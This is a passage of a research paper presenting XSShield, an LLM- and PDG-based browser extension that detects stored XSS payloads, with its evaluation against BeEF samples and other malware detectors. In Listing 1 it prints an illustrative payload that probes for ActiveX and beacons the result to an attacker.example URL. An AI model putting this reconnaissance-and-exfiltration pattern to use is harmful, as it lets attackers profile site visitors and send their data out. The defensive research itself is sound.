We implemented a Code Representation Generator capable of transforming PDGs into optimized formats adapted for LLM analysis while ensuring semantic integrity. After completing PDG construction and logical subgraph partitioning, this generator uses the native code format to produce code representations specifically for LLM analysis, thereby fully leveraging the LLM's strengths in processing source code.
The generator employs a two-phase processing approach: the first phase systematically traverses AST nodes in the PDG, maintaining the program’s original structure through explicit mapping of control and data flow dependencies; the second phase performs controlled code restructuring, preserving key semantic associations identified during dependency analysis by applying context-aware transformation rules that prioritize critical program behaviors. The entire transformation process consistently follows strict semantic fidelity protocols verified through cross-validation with original program-execution traces.
The final generated code representation serves as behavioral features, effectively preserving the structural characteristics and semantic properties of the target program. This approach ensures direct compatibility with LLM processing mechanisms while retaining the program’s core semantics, simultaneously avoiding redundant factors that might affect analysis through systematic pruning of non-essential code constructs. Following minimalist design principles, the generator preserves only necessary constructs required for capturing behavioral patterns, including control flow statements, data dependencies, and critical API calls, while eliminating redundant expressions and non-essential variables. The generator’s effectiveness is further validated through comparative analysis with alternative representation methods, demonstrating superior performance in behavioral pattern retention and LLM compatibility.

3.3. LLM-Based Detector

The framework adopts a pre-trained LLM (e.g., GPT-3.5-turbo) as the base model without additional fine-tuning. This design choice leverages the model’s inherent code-comprehension capability while avoiding the computational overhead of model retraining. The detection capability is achieved through our innovative prompt optimization rather than model parameter updates.
Based on the extraction and processing of multiple candidate code segments from the target code described in Section 3.2, we constructed a pre-trained LLM-based detection framework. This framework operates using prompts that have undergone comprehensive training optimization as detailed in Section 3.1. Our prompt-engineering approach integrates both semantic precision and structural optimization dimensions to enhance model-understanding capabilities for specific tasks.
Structured Output. To achieve reliable binary classification, we designed an output-control mechanism. This mechanism enforces that model responses begin with "yes" or "no" by adding a format requirement to the base prompt. Specifically, the instruction "answer with 'yes' or 'no'" is appended to the original prompt. This design not only improves classification accuracy but also eliminates output ambiguity. The output-control mechanism is formally expressed as:
$$\mathrm{Prompt}_{\mathrm{final}} = \mathrm{Prompt}_{\mathrm{original}} + \text{“answer with ‘yes’ or ‘no’”}$$
where $\mathrm{Prompt}_{\mathrm{original}}$ is the initial training prompt, and the additional instruction ensures that the model's response starts with "yes" or "no". $\mathrm{Prompt}_{\mathrm{final}}$ is the complete prompt sequence used for model queries.
This structured approach ensures consistency and accuracy in LLM outputs, enabling the framework to reliably identify potential attack vectors in code segments while maintaining high detection accuracy.
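A minimal sketch of this wrapper is shown below; queryLLM stands in for whichever chat-completion API is used, and the exact prompt wording is illustrative.

// Append the format instruction and map the model's reply to a boolean verdict.
async function classifySegment(promptOriginal, codeSegment, queryLLM) {
  const promptFinal = `${promptOriginal}\n\nCode segment:\n${codeSegment}\nanswer with 'yes' or 'no'`;
  const reply = await queryLLM(promptFinal);
  return reply.trim().toLowerCase().startsWith("yes"); // true => segment flagged as malicious
}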

4. Experiment

4.1. Implementation

Evaluation Set. This research implemented the XSShield framework as a browser extension, drawing upon relevant code from previous research [30]. The extension is designed to intercept JavaScript payloads during webpage rendering through strategic hook injection into XMLHttpRequest and fetch API, enabling comprehensive monitoring of both static and dynamically loaded script content.
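An illustrative sketch of such interception hooks is shown below; this is not the extension's actual code, and the inspect callback is a hypothetical hand-off point to the detector.

// Wrap window.fetch and XMLHttpRequest so JavaScript responses can be inspected.
(function installHooks(inspect) {
  const origFetch = window.fetch;
  window.fetch = async function (...args) {
    const resp = await origFetch.apply(this, args);
    try {
      const clone = resp.clone();
      const type = clone.headers.get("content-type") || "";
      const url = typeof args[0] === "string" ? args[0] : String(args[0].url || args[0]);
      if (type.includes("javascript")) inspect(await clone.text(), url);
    } catch (e) { /* never break the page if inspection fails */ }
    return resp;
  };

  const origOpen = XMLHttpRequest.prototype.open;
  XMLHttpRequest.prototype.open = function (method, url, ...rest) {
    this.addEventListener("load", () => {
      if (this.responseType && this.responseType !== "text") return;
      const type = this.getResponseHeader("content-type") || "";
      if (type.includes("javascript")) inspect(this.responseText, url);
    });
    return origOpen.call(this, method, url, ...rest);
  };
})(function inspect(code, url) {
  // Hand the intercepted script to the Data Adaptor / detector here.
  console.log("intercepted script from", url, "length:", code.length);
});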
The evaluation methodology employed a target machine containing stored XSS vulnerabilities, tested against 610 diverse XSS attack samples. This dataset comprised 305 attacks derived from the BeEF repository [31], carefully selected to encompass all attack modules categorized within the framework. For example, Listing 1 shows a typical stored XSS attack fragment that detects ActiveX components in a victim's browser and reports the findings back to the attacker's server.
Listing 1. A code fragment demonstrating ActiveX component detection via stored cross-site scripting vulnerability.
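An illustrative payload of this kind (not the actual BeEF module code; the probed ProgID and reporting endpoint are hypothetical) might look as follows:

// Illustrative only: probe for an ActiveX component and beacon the result.
(function () {
  var result = "no-activex";
  try {
    if (window.ActiveXObject || "ActiveXObject" in window) {
      new ActiveXObject("WScript.Shell"); // probe a well-known ProgID
      result = "activex-enabled";
    }
  } catch (e) {
    result = "activex-blocked";
  }
  // Report the finding back to an attacker-controlled server.
  new Image().src = "https://attacker.example/report?activex=" + encodeURIComponent(result);
})();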
Additionally, 305 obfuscated attack variants were generated by applying the JavaScript-Obfuscator tool [32] with default configuration settings to the original BeEF samples. This configuration implemented multiple obfuscation techniques, including variable renaming, string array transformation, and string array rotation and shuffling.
All attack samples were derived from JavaScript engine-execution traces, forming the malicious evaluation set. These attacks can be categorized into information reconnaissance, unauthorized resource access, cross-platform mobile application attacks, social engineering-driven persistent threats, auxiliary operation support, and cross-protocol attack paths. Each category is detailed in Appendix A.
To establish a balanced evaluation methodology, 305 low-redundancy benign samples were selected from the JS150k dataset based on Jaccard similarity. The selection process identified and chose the 305 samples with the lowest Jaccard similarity scores to ensure maximum diversity and minimal redundancy in the benign dataset.
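As an illustration of this selection criterion, the Jaccard similarity between two samples can be computed over their token sets as sketched below; the tokenization rule is an assumption, as the paper does not specify it.

// Jaccard similarity between two token sets: |A ∩ B| / |A ∪ B|.
function jaccard(aTokens, bTokens) {
  const a = new Set(aTokens), b = new Set(bTokens);
  let inter = 0;
  for (const t of a) if (b.has(t)) inter++;
  return inter / (a.size + b.size - inter);
}

// Simple tokenizer splitting on non-identifier characters.
function tokenize(code) {
  return code.split(/[^A-Za-z0-9_$]+/).filter(Boolean);
}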
For experimental consistency, GPT-3.5-turbo was utilized for prompt optimization and testing, with standardized LLM parameters (top_k = 1, temperature = 0). A consistent system prompt was maintained across all experiments, with complete details provided in Figure A1a.
Experiment Platform Setup. Prompt training was conducted on a Windows Server 2016 server configured with an Intel(R) Xeon(R) Gold 6248R processor (Intel, Santa Clara, CA, USA) at 3.00 GHz and 384 GB memory. Attack experiments were executed on a Linux server running Ubuntu 22.04.4 LTS, serving as both attack platform and target machine. This Linux server was equipped with an AMD(R) Ryzen 7 7800X3D 8-core processor (AMD, Santa Clara, CA, USA) and 16 GB memory.

4.2. Evaluation

This section presents a comprehensive experimental evaluation of the XSShield framework, focusing on three key research questions:
  • RQ1—Comparativeness: What advantages does the XSShield framework offer compared to existing mainstream malware-detection tools? We evaluate the framework’s defense effectiveness against various attack vectors and compare it with other state-of-the-art open-source malware detectors to identify its advantages.
  • RQ2—Effectiveness: Are all components of XSShield performing their intended functions? This question is addressed by analyzing each module’s contribution to the framework’s overall accuracy and defense capabilities.
  • RQ3—Efficiency: How much runtime overhead does the code-transformation process introduce? We quantify the framework’s time consumption through detailed performance analysis.
To systematically address these research questions, we designed and conducted a series of experiments. First, we used BeEF attack samples and benign code samples as an evaluation set to comparatively analyze the performance differences between our framework and existing open-source malware-detection tools. Second, we individually tested the effectiveness of each XSShield module. Finally, we evaluated the framework’s performance overhead and resource utilization through rigorous test suites to verify its feasibility in practical application environments.

4.2.1. Experimental Setup

Development Set. To support the training of prompts and malware detectors, this research employed multiple annotated and authoritative datasets, as shown in Table 1. Initially, we introduced a dataset containing 150,000 benign JavaScript samples [33] sourced from GitHub repositories, which has been widely used in JavaScript malware detection. Notably, 305 low-redundancy samples were excluded from the development set to ensure data independence and reliability. Additionally, the malicious samples used in the development set came from three datasets: VirusTotal [34], Hynek Petrak’s JavaScript Malware Collection [35], and GeeksOnSecurity’s JavaScript Malicious Code Dataset [36]. These datasets contain diverse JavaScript malicious code, including multi-source detection results, specially maintained malicious code collections, and samples from actual network attacks. The comprehensive utilization of these datasets effectively enhanced malware detector performance.
Malware Detectors. We selected four mainstream JavaScript malware detectors based on static analysis and machine learning to evaluate the effectiveness of obfuscation techniques. These detectors are widely used by relevant researchers [37]. We specifically selected these JavaScript malware detectors (Cujo, Zozzle, JStap) for comparison because, unlike traditional XSS defense mechanisms that require trusted server environments, these client-side detection methods can potentially function when server integrity is compromised. This aligns with our research goal of defending against stored XSS attacks in scenarios where server-side defenses have been bypassed or disabled by attackers who have gained server access. When training these detectors, benign and malicious datasets were divided into train, validation, and test sets in proportions of 60%, 20%, and 20%, respectively, as development set, with models trained strictly according to each project’s specified procedures.
Cujo [38] decomposes source code into lexical tokens and efficiently extracts these tokens from JavaScript code through custom Yacc grammar. Feature extraction is completed using Q-gram techniques, followed by classification using Support Vector Machines. In this evaluation, we used Fass et al.’s reimplementation [39] of Cujo’s static detection component.
Zozzle [40] extracts syntactic information from JavaScript’s AST, performs feature selection through correlation methods, and then uses Bayesian classifiers for data classification. This study employed Fass et al.’s reimplementation [41] of Zozzle.
JStap [42] extracts representations from code, including lexical tokens, AST, and Control Flow Graphs (CFGs). Feature extraction employs N-Gram features and node value features, followed by classification using random forest classifiers. In this evaluation, we focused on its AST abstraction and PDG abstraction, utilizing n-gram and value feature-extraction patterns. We used the official implementation [43] available on GitHub.

4.2.2. Effectiveness Evaluation

Performance of XSShield. To evaluate XSShield’s effectiveness in detecting stored XSS attacks, we conducted performance testing on the evaluation set with GPT-3.5-turbo as the base model. In this binary classification task, besides detection accuracy, we also employed Matthews Correlation Coefficient (MCC) and F1 score as evaluation metrics. MCC provides a comprehensive evaluation of model performance, while the F1 score reflects the harmonic mean of precision and recall. An ideal attack detector should have high discrimination ability and classification accuracy, with MCC and F1 scores approaching 1. The dual-metric evaluation system using MCC and F1 scores enables both comprehensive objective assessment of classifier performance on positive and negative samples and examination of its ability to reduce false positives and improve detection rates in practical applications.
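For reference, both metrics can be computed directly from the binary confusion matrix; tp, tn, fp, and fn denote true positives, true negatives, false positives, and false negatives.

// Harmonic mean of precision and recall.
function f1Score(tp, fp, fn) {
  if (tp === 0) return 0; // convention when nothing is correctly flagged
  const precision = tp / (tp + fp);
  const recall = tp / (tp + fn);
  return (2 * precision * recall) / (precision + recall);
}

// Matthews Correlation Coefficient over all four confusion-matrix cells.
function mcc(tp, tn, fp, fn) {
  const num = tp * tn - fp * fn;
  const den = Math.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn));
  return den === 0 ? 0 : num / den;
}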
Results. Table 2 presents a comprehensive performance comparison across XSShield and other detectors (columns), evaluating their detection capabilities on classified evaluation set (rows). XSShield demonstrates excellent performance across various attack scenarios. For non-obfuscated samples, the framework achieves 90.66% detection accuracy, an F1 score of 0.8991, and MCC of 0.8137, demonstrating powerful discrimination ability. In key attack categories, the framework performs particularly well: detection rates reach 93.75% for persistence and social engineering attacks, and 92.92% for vulnerability-based attacks. When facing obfuscated samples representing more complex attack variants, XSShield maintains stable performance: 72.46% detection rate, 0.7018 F1 score, and 0.5973 MCC. Although lower than for non-obfuscated samples, these results still significantly outperform existing methods in handling obfuscated attacks. Notably, the framework demonstrates robust performance in detecting obfuscated persistence attacks (71.88%) and vulnerability-based attacks (69.03%). Another outstanding advantage of XSShield is its low false positive rate, reflected in its high accuracy in identifying benign samples (97.05% for non-obfuscated and 80.00% for obfuscated samples). This characteristic is crucial for practical deployment, as high false positive rates often prevent security systems from being effectively applied in production environments. The framework’s overall performance with comprehensive MCC of 0.7055 and F1 score of 0.8005 confirms XSShield’s excellent performance in both attack detection and benign traffic recognition.
Comparison with Other Malware Detectors. To evaluate XSShield’s relative advantages, we conducted comparative analysis with other advanced malware detectors. Notably, due to JavaScript’s inherent limitations and potential complexities in code-transformation processes, certain code samples may not be correctly parsed by detectors. These samples were excluded from training data, potentially causing deviations between actual and ideal model performance for different detectors. To ensure evaluation reliability, we conducted tests on the test set, with results recorded in Table 3.
Our comparative analysis focuses exclusively on detection methods that can operate when server integrity is compromised, as XSShield is specifically designed for this threat model. Conventional XSS defenses were excluded from our comparison because they fundamentally rely on trusted server environments, which contradicts our core research assumption of defending against attacks after server compromise has occurred.
Results. Table 2 presents the recall rate comparison between XSShield and other detectors when processing attack vector scripts and benign scripts (detectors listed in columns, attacks and benign scripts in rows). After categorizing BeEF-based attack vectors, we tested each detector’s detection effectiveness on both original code and obfuscated code, calculating corresponding MCC and F1 scores.
Analysis reveals that when facing original attack implementations, all comparison group detectors performed poorly, generally misclassifying both attack and non-attack samples as benign. When processing obfuscated attacks, Cujo showed no response, while other detectors displayed limited reaction. JStap’s four variants performed inadequately; although F1 scores showed slight improvement (maximum reaching only 0.1354), considering the significant decrease in MCC (minimum of −0.1900), this improvement likely stems from obfuscation-induced bias. Zozzle performed better on obfuscated attack samples (F1 score of 0.5983) but completely failed on obfuscated non-attack samples (0% accuracy), misclassifying many obfuscated benign samples as malicious, indicating the framework’s over-reliance on obfuscation features as malicious indicators.
In contrast, XSShield was the only framework maintaining reliable detection capability across both obfuscated and non-obfuscated datasets, although its recognition rate for obfuscated samples (64.92%) still has room for improvement. This performance nevertheless demonstrates XSShield’s ability to effectively identify attack samples while maintaining accurate judgment of benign samples—a capability that becomes even more significant when considering false positive management.
This comparison reveals a critical distinction: While JStap(astvalue) achieves 97.70% benign accuracy on obfuscated samples, it fails to detect 50.98% of actual attacks, reflecting a classic precision–recall tradeoff. XSShield, by contrast, strikes a superior balance—its 80% obfuscated benign accuracy (vs. Zozzle’s catastrophic 0%) combined with 72.46% attack detection rate demonstrates practical viability in real-world deployment scenarios where both metrics are crucial.
These findings align with the broader research consensus showing that structure-based malware detectors generally fail to identify actual deployed attacks, tending to misclassify them as benign samples. Within this context, XSShield demonstrates stable and reliable performance across various test scenarios, maintaining relatively high detection accuracy and low false positive rates for both original and obfuscated attacks—a dual capability that existing detectors struggle to achieve simultaneously.

4.2.3. Ablation Experiment

Effectiveness of the Prompt Optimizer. To evaluate the effectiveness of the XSShield Prompt Optimizer module, we designed a comparative experiment testing three different prompt-selection algorithms: Non-selector: using fixed handcrafted prompts without optimization; UCB: standard Upper Confidence Bound bandits prompt selection algorithm; and UCB-R: our improved Upper Confidence Bound bandits with weighted randomization prompt-optimization algorithm.
Results. Figure 3 shows the F1 score trajectory during training. UCB-R demonstrates significant performance improvement, attributed to the introduction of randomness factors.
Table 4 shows XSShield’s detection accuracy under three configurations. Our improved UCB-R algorithm achieves 71.97% overall accuracy, demonstrating improvements of 13.61 percentage points over the baseline (58.36%) and 12.30 percentage points over the standard UCB (59.67%). The enhancement is particularly notable in malicious sample identification, where UCB-R achieves a 24.92 percentage point improvement in detection accuracy (from 43.28% to 68.20%) compared to the baseline.
These results verify our hypothesis that UCB-R can more effectively explore and exploit prompt space compared to fixed prompts or traditional UCB selection algorithms. UCB-R’s excellent performance likely benefits from its improved balance between exploration and exploitation, enabling faster identification and adoption of high-performance prompts during optimization.
Effectiveness of the Data Adaptor. To evaluate the Data Adaptor module’s impact on XSShield’s performance, we conducted a second experiment. The experiment compared system effectiveness with and without this module enabled: Data Adaptor Enabled: utilizing code segmentation based on PDG and PDG partitioning techniques; and Data Adaptor Disabled: direct code splitting by fixed length without specialized processing.
Results. Table 4 columns “Non-adaptor” (adaptor disabled) and “Adaptor” (adaptor enabled) display performance with and without the Data Adaptor module.
Effectiveness of Different pre-trained LLMs. To investigate how various pre-trained LLMs affect XSShield’s performance, we conducted comprehensive comparative analysis using three widely applied LLMs as determination models: (a) GPT-3.5-turbo, (b) GPT-4, and (c) Gemini-Pro. These models were selected for their widespread application and diverse capabilities in natural language processing, aiming to analyze how model selection influences XSShield’s overall effectiveness in detecting vectors implemented in stored XSS attacks.
Results. As shown in Table 5, different pre-trained LLMs significantly impact XSShield’s detection performance. In performance evaluation, GPT-4 achieved optimal performance with an F1 score of 0.9266; GPT-3.5-turbo followed with an F1 score of 0.9001; while Gemini-Pro performed relatively weaker with an F1 score of only 0.2112. This performance disparity highlights the significant influence of model selection on XSShield framework effectiveness. The notable performance gap between GPT series models and Gemini-Pro particularly emphasizes the necessity of careful model selection when deploying XSShield. Overall, experimental results indicate that while XSShield can achieve excellent performance when using appropriate LLMs, its effectiveness varies significantly based on model selection. This variability suggests that actual XSShield deployment requires not only comprehensive model evaluation and selection but also continued in-depth research to understand and narrow performance gaps between different language models.

4.2.4. Efficiency Evaluation

To evaluate XSShield’s performance overhead, we conducted a comparative analysis of its execution time. Since prompts are optimized offline and the LLM’s decision time is primarily determined by network conditions, we denote the model-communication portion as Δ in the results. Table 6 compares the efficiency of XSShield with other detection techniques across the evaluation sets.
Results. According to Table 6, while XSShield’s time overhead is not the lowest, it remains within an acceptable range and does not noticeably affect normal browsing. When processing non-obfuscated malicious scripts, XSShield outperforms some existing techniques and remains comparable to others. For obfuscated malicious scripts, its processing time increases slightly but still surpasses several existing techniques. In terms of average processing time per file, XSShield is not the fastest but remains competitive with mainstream techniques. Considering that the network latency Δ may be small in practice, XSShield’s real-world performance is likely close to that of these techniques.
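To make the reported decomposition concrete, the sketch below shows one way the per-file cost could be instrumented: local processing is timed separately from the model call, which corresponds to the Δ term in Table 6. The helper functions are hypothetical placeholders, not XSShield’s actual modules.

```python
# Hedged sketch of the "local time + Δ" timing decomposition.
import time

def build_representation(js_code: str) -> str:
    """Placeholder for the Data Adaptor pipeline (PDG slicing + code representation)."""
    return js_code

def query_llm(representation: str) -> str:
    """Placeholder for the remote determination-model call (the network-bound Δ term)."""
    return "benign"

def timed_detection(js_code: str):
    t0 = time.perf_counter()
    representation = build_representation(js_code)   # local processing, reported explicitly
    t1 = time.perf_counter()
    verdict = query_llm(representation)              # model-communication overhead Δ
    t2 = time.perf_counter()
    return verdict, t1 - t0, t2 - t1                 # (decision, local seconds, Δ seconds)
```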
In summary, while XSShield’s processing time is slightly higher than some existing technologies in specific scenarios, its overall performance does not notably impact user experience. Given that XSShield provides stronger security guarantees and LLM-based flexibility, this slight performance trade-off is acceptable.

5. Discussion

5.1. Why Choose Prompt Optimization over Fine-Tuning and Retrieval-Augmented Generation?

Modern language models can be enhanced through three main approaches: fine-tuning adapts model parameters for specific tasks through additional training; Retrieval-Augmented Generation enhances model outputs by incorporating external knowledge; and prompt optimization explores semantic space through input engineering.
While fine-tuning excels in specialized tasks and can achieve state-of-the-art performance, it requires significant computational resources and frequent updates to maintain effectiveness. This makes it less ideal for dynamic security environments requiring rapid adaptation. RAG systems provide comprehensive knowledge integration but may face challenges in scenarios requiring real-time reasoning beyond their knowledge base, particularly when confronting novel security threats.
Prompt optimization offers distinct advantages in security contexts. First, it enables rapid adaptation to new threats without architectural modifications or extensive retraining. Second, its lightweight nature ensures low latency response while maintaining detection effectiveness. Third, it can be dynamically adjusted based on emerging threat patterns, making it particularly suitable for resource-constrained environments requiring real-time threat response. Empirical evidence suggests that well-designed prompts can achieve comparable performance to fine-tuned models in many security applications while significantly reducing computational overhead.

5.2. Why Is Network Latency Not a Key Bottleneck for XSShield Deployment?

XSShield currently performs inference by calling external LLM service APIs, which does introduce some network latency. However, experimental data show that the framework’s average processing time is only 0.205 s (excluding model communication overhead), having minimal impact on typical webpage-loading times. More importantly, with advances in model-compression techniques and dedicated hardware accelerators, deploying small but high-performance models locally has become feasible. This local deployment approach will completely eliminate network communication overhead, reducing end-to-end processing time to only the core computation process, thereby significantly enhancing system performance.
While XSShield’s reliance on external LLM services introduces network latency, operational costs, and dependency risks, these challenges can be mitigated through strategic design choices. Local deployment of lightweight models using model-compression techniques eliminates network communication overhead and reduces costs. Hybrid detection mechanisms combining LLMs with traditional static analysis further reduce dependency on third-party services while enhancing system resilience. Additionally, efficient prompt optimization and batching inference requests can minimize operational expenses. These approaches collectively balance performance, cost, and security, making XSShield a practical and scalable solution for real-world XSS detection.

5.3. How Does Current Large Language Model Performance Affect Obfuscated Code Detection?

Our research finds that this method achieves a 72.46% accuracy rate in detecting obfuscated JavaScript code, notably lower than the 90.66% accuracy rate for non-obfuscated code. This gap primarily stems from two aspects: first, current LLMs’ limited capability in processing highly obfuscated code; second, inadequacies in existing code behavior-representation methods. Although this detection accuracy already surpasses traditional methods, it still indicates the need to develop more advanced code-analysis techniques.
This performance limitation is expected to improve through two pathways: first, as more advanced language models develop, code-understanding capabilities will be enhanced; second, developing more effective code behavior-representation methods can more accurately capture semantic features of obfuscated code. Particularly noteworthy are recent advances in code-specific pre-training and multimodal learning domains, which provide promising research directions for improving obfuscated code-detection performance while maintaining the framework’s high detection capability for regular samples.

5.4. How Does Domain-Specific Optimization Impact Stored XSS Detection Performance?

XSShield significantly outperforms general-purpose code analysis tools (93% accuracy versus approximately 50%), demonstrating the effectiveness of security-domain optimization. The framework’s superior performance stems from domain-aware design choices: prompt optimization engineered specifically for XSS attack-pattern recognition enables deeper semantic understanding than traditional structure-based approaches. Moreover, the PDG adaptation mechanism, by preserving security-critical control-flow relationships, yields an improvement of 14.1 percentage points in detection accuracy. Additionally, this domain-specific approach maintains robust detection of obfuscated samples (64.92% accuracy) where conventional detectors prove ineffective. These results demonstrate the substantial impact of security-domain optimization in enhancing foundation models’ effectiveness.

5.5. How Does UCB-R Handle Potential Dependencies Between Prompts?

A fundamental assumption in traditional UCB algorithms is the independence of trials. However, in prompt-engineering scenarios, this assumption may not strictly hold due to the semantic correlations between prompts. Specifically, prompts generated through gradient-based updates (cf. Algorithm 1) could inherit similar semantic structures, potentially leading to correlated performance patterns.
Our UCB-R algorithm incorporates several mechanisms to mitigate the impact of potential prompt dependencies. First, instead of relying on single-trial outcomes, UCB-R employs a batch-based evaluation approach where prompt performance is assessed on batched samples. The success and failure counts are updated based on aggregated scores from these batch evaluations, which helps smooth out potential correlations in individual trials. Second, the algorithm implements a dynamic exploration rate in which the exploration coefficient decreases as the number of trials increases. This adaptive exploration strategy ensures that the algorithm gradually shifts focus from exploration to exploitation as more evidence is gathered. Finally, rather than deterministically selecting prompts with the highest UCB scores, UCB-R employs a weighted random selection mechanism. This stochastic approach introduces additional randomization that can help break potential dependencies between consecutive selections.
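To make these mechanisms concrete, the following sketch gives a minimal, illustrative implementation of the selection step: UCB scores computed from batch-level success/failure counts, an exploration coefficient that decays with the number of trials, and weighted random selection in place of a greedy argmax. The decay schedule, initial coefficient, and weighting details are assumptions for illustration rather than XSShield’s exact parameterization.

```python
# Hedged sketch of UCB-R prompt selection: UCB scores with a decaying exploration
# coefficient, turned into weights for stochastic (rather than greedy) selection.
import math
import random

def ucb_r_select(successes, failures, total_trials, c0=2.0, rng=random):
    """Pick a prompt index given per-prompt success/failure counts from batch evaluations."""
    # Exploration coefficient shrinks as evidence accumulates (assumed schedule).
    c = c0 / math.sqrt(1 + total_trials)

    scores = []
    for s, f in zip(successes, failures):
        n = s + f
        if n == 0:
            scores.append(float("inf"))          # untried prompts get priority
            continue
        mean = s / n                             # empirical success rate from batch scores
        bonus = c * math.sqrt(math.log(total_trials + 1) / n)
        scores.append(mean + bonus)

    # Weighted random selection instead of deterministic argmax.
    if any(math.isinf(x) for x in scores):
        untried = [i for i, x in enumerate(scores) if math.isinf(x)]
        return rng.choice(untried)
    weights = [max(x, 1e-9) for x in scores]
    return rng.choices(range(len(scores)), weights=weights, k=1)[0]

# Example: three candidate prompts with aggregated batch results.
successes, failures = [8, 5, 1], [2, 5, 1]
chosen = ucb_r_select(successes, failures, total_trials=sum(successes) + sum(failures))
```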
While these mechanisms do not entirely eliminate the impact of prompt dependencies, they provide practical approaches to maintain the algorithm’s effectiveness. Future work could explore more sophisticated methods to explicitly model and account for semantic correlations between prompts, potentially through the introduction of a similarity-based regularization term in the UCB calculation.

5.5.1. Limitations

While our approach offers practical solutions to handle prompt dependencies, several theoretical and implementation challenges remain. The current approach lacks theoretical guarantees when trials exhibit dependencies, and extending the convergence analysis to correlated settings remains an open challenge. Moreover, the performance of the algorithm depends on two key hyperparameters: the batch size for evaluation and the rate of exploration coefficient decay. The optimal values for these parameters may vary significantly across different prompt spaces and task domains, necessitating careful tuning based on specific application characteristics.
Furthermore, as our framework relies on LLMs, it inherits certain intrinsic limitations. Despite LLMs’ capacity for semantic understanding and malicious behavior detection, their effectiveness is contingent on code-comprehension capabilities. The framework faces challenges including potential hallucinations, substantial computational costs, vulnerability to adversarial attacks, and false positives that may reduce system practicality. In particular, LLMs are known to be vulnerable to adversarial attacks, where slight modifications to input payloads (e.g., JavaScript code) can bypass detection mechanisms. Recent work in LLM-based security applications [44,45] has demonstrated the effectiveness of federated learning and adversarial training against model-poisoning attacks, suggesting promising directions for enhancing XSShield’s robustness. Such attacks could undermine XSShield’s effectiveness in real-world scenarios. To mitigate this risk, future work could explore the use of private, fine-tuned LLMs, adversarial training techniques, hybrid detection mechanisms combining LLMs with traditional static analysis, and continuous monitoring and updates to address emerging threats. Additionally, there exists a fundamental trade-off between input size and model comprehension—even after code slicing, code fragments may remain too extensive for the model to process effectively, potentially impeding accurate code behavior understanding.
The application of LLMs in security domains also introduces inherent risks, as carefully crafted inputs could potentially mislead models into misclassifying malicious code. Potential mitigation strategies include hybrid approaches combining traditional static analysis with LLM techniques, regular model updates to address emerging attack vectors, and implementing human verification mechanisms for high-risk scenarios.

5.5.2. Future Work

While XSShield demonstrates significant advantages in defending against stored XSS attacks, several promising research directions remain. Future work will focus on narrowing the performance gap between non-obfuscated and obfuscated attack detection through improved prompt-engineering and semantic representation techniques. To address latency concerns, we plan to explore on-device deployment of lightweight LLMs using model quantization and distillation methods. The framework could be enhanced with adaptive defense mechanisms that continuously learn from emerging attack patterns through efficient incremental prompt optimization. Integration with existing security standards like Content Security Policy would facilitate broader adoption across different platforms. Additionally, extending XSShield to provide explainable detection decisions would transform it into both a defensive tool and an educational resource for security professionals.
A critical area for future research is improving the robustness of XSShield against adversarial attacks. This includes exploring adversarial training techniques to harden the LLM against manipulated inputs, developing hybrid detection systems that combine LLMs with traditional static and dynamic analysis methods, and implementing real-time monitoring to detect and respond to adversarial payloads. Furthermore, leveraging private, fine-tuned LLMs with domain-specific adversarial examples could enhance the framework’s resilience to sophisticated attacks. These improvements would collectively strengthen XSShield’s capabilities while maintaining its lightweight nature and practical deployability in real-world environments.

6. Related Work

6.1. XSS Defense

XSS defense technology has evolved from static defense to dynamic tracking, and then to intelligent detection. Early research primarily focused on basic defense mechanisms, such as the browser-enforced embedded policies proposed by Jim et al. [46] and the Noncespaces technique proposed by Van Gundy et al. [47], the latter preventing markup injection attacks through randomized namespace prefixes.
As attack methods became more complex, research focus shifted toward more refined defense solutions. Stock et al. [48] proposed precise client-side XSS filtering technology based on dynamic data flow tracking, while Samuel et al. [49] developed context-sensitive automatic sanitization technology. Weinberger et al. [50] conducted systematic analysis of such XSS sanitization frameworks to improve their effectiveness.
Recent research has begun introducing intelligent methods, such as Melicher et al. [51] applying machine learning techniques to XSS attack detection and defense, while West et al. [52] explored client-side CSP implementation solutions. As Gupta et al. [7] pointed out in their survey, detecting complex XSS attack paths still faces significant challenges.
Reviewing existing research, most XSS defense solutions focus on detecting injection-type XSS vulnerabilities (i.e., identifying vulnerable injection points using simple attack vectors) rather than defending against the attack vectors themselves, and they therefore often struggle to address real-world attack methods.

6.2. Malicious JavaScript Detection

In the field of malicious JavaScript detection, researchers have proposed various detection methods. Curtsinger et al. [40] developed the Zozzle tool to identify potentially malicious scripts through static analysis of JavaScript ASTs. Rieck et al. [38] developed the CUJO system, combining static and dynamic analysis methods to detect drive-by download attacks. However, these early methods often struggled to address evasion techniques such as dynamic code generation and obfuscation.
Addressing this challenge, subsequent research made progress in multiple directions. Agten et al. [53] revealed security challenges posed by fragile JavaScript code through in-depth study of client-side sandbox mechanisms. Kolbitsch et al. [54] explored multi-execution techniques for discovering environment-dependent malware. Fass et al. further advanced the combination of static and dynamic analysis methods through developing the JaSt [55] and JStap [42] systems.
In recent years, machine learning methods have shown promising application prospects in this field. Wang et al. [56] demonstrated the effectiveness of recurrent neural networks in analyzing JavaScript execution trajectories, while Ndichu et al. [57] further applied deep learning methods to analyze AST features and paragraph vectors. However, it is worth noting that relying solely on code structure analysis to determine malicious intent has fundamental limitations, as attackers can carefully design payloads that appear legitimate but are actually malicious.

6.3. Prompt Crafting

Research on prompt-learning techniques has made significant progress and is increasingly applied in the cybersecurity domain. Liu et al. constructed a comprehensive framework integrating pre-trained language models and prompt learning. Shin et al. [58] developed the AutoPrompt system, achieving automatic generation of task-specific prompts. Gao et al. [59] expanded application scenarios by combining prompt learning with few-shot learning. Schick and Schütze [60] enhanced models’ few-shot learning capabilities through pattern-exploiting training.
In security applications, Li et al. [61] studied prefix-tuning techniques to better adapt LLMs to specific security tasks. Brown et al. [62] demonstrated LLMs’ advantages in code understanding using advanced prompt-engineering techniques, providing important support for security analysis. Additionally, Wu et al. [63] proposed feature-extraction-enhancement schemes based on advanced prompt engineering, while Wang et al. [64] integrated systems such as LangChain and GPT-3.5-turbo for automated vulnerability detection. Although existing research has achieved important results, the application potential of prompt learning in network security analysis remains to be further explored.

7. Conclusions

This paper presents XSShield, a novel client-side framework that detects and defends against stored XSS attacks through code intent recognition. The framework combines LLMs and PDGs for JavaScript code semantic analysis, breaking through limitations of traditional differential analysis methods. Experimental results demonstrate that XSShield shows significant advantages in stored XSS attack identification compared to existing solutions. The framework adopts a semi-automated learning mechanism, enabling continuous adaptation to new attack patterns, providing a robust and sustainable solution for long-term network security protection. These research findings are expected to help the community better address the increasingly severe threat of stored XSS vulnerabilities.

Author Contributions

